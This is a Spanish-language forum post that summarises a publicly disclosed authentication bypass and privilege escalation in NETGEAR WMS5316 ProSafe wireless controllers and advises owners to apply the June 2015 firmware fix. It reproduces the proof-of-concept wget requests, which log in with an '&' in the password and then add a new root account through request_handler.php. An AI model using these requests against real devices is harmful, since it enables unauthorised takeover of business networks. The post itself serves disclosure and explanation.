El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
Anuncio
#1 08-09-2015 17:07:58
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,624
Los NETGEAR WMS5316 ProSafe 16AP no parecen muy "safe"
El switch NETGEAR WMS5316 ProSafe (16AP) comprometido por entrada sin credenciales y escala de privilegios
El "pro safe" es un switch de Netgear para redes profesionales.
Con este dispositivo se puede crear una red de hasta 16 puntos de accesos que controlamos gracias a la interfaz en java proporcionada por Netgear
Elliot LEWIS explica hoy como saltarse los credenciales para entrar en la interfaz de gestión de la red.
Y luego nos explica como obtener los privilegios de administrador para hacer modificaciones en la configuración.
Elliot ha descubierto la brecha en mayo y ha trabajado conjuntamente con Netgear.
Así que la vulnerabilidad esta corregida a partir del firmware que ha sacado en junio el fabricante.
Para los numerosos empresarios miembros de wifi-libre - y dios sabe que son muchos 
- es muy importante hacer un update de su "ProSafe"
Para los demás interesemos-nos a los mecanismos descritos en el full disclosure :
NETGEAR WMS Authentication Bypass / Privilege Escalation @ PacketStorm
¿Como entrar en la GUI de gestión de la red sin conocer los credenciales? : ¡Con &!
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txtEn el ejemplo usamos wget para forzar la entrada y crear una sesión gracias a un coockie.
Para lograr que no seamos rechazados debemos incluir el símbolo & en la contraseña que mandamos en nuestros datas POST para autenticarse.
Podéis ver en el ejemplo que nos da el POC que se pone un simple & aqui
password%22%3A%20%22&%22%7D
Pasado un momento la GUI va a aceptarnos y podremos visitar la GUI con ellos.
¿Como obtener los privilñegios de administrador para hacer lo que queremos?
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.phpLa idea aquí es simplemente de añadir con datas POST otra cuenta root.
Una vez hecho la usaremos para tomar el control de la red.
No será necesario esta vez usar el símbolo &
¡Hasta la próxima!
Desconectado
Anuncio
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
| 0 | 10 | Ayer 23:14:49 por kcdtv | |
|
AWITAS. Ataque a WPS con rogueAP potegido con WPA por javierbu
|
6 | 319 | 24-11-2022 18:25:51 por Koala |
|
Liberar Quamtum Access Q3 por Alan Robles
|
2 | 209 | 24-11-2022 13:04:21 por kcdtv |
|
STAPi Resurección por javierbu
|
9 | 596 | 23-11-2022 23:53:57 por javierbu |
|
Pegado: |
434 | 58179 | 23-11-2022 11:02:43 por v1s1t0r |
Información del usuario
Ultimo usuario registrado: montero.09
Usuarios registrados conectados: 0
Invitados conectados: 27
Estadisticas de los foros
Número total de usuarios registrados: 2,390
Número total de temas: 1,611
Número total de mensajes: 15,369
Atom tema feed - Impulsado por FluxBB
© 2014-2022 Wifi-libre.com - [ Generated in 0.03 seconds ]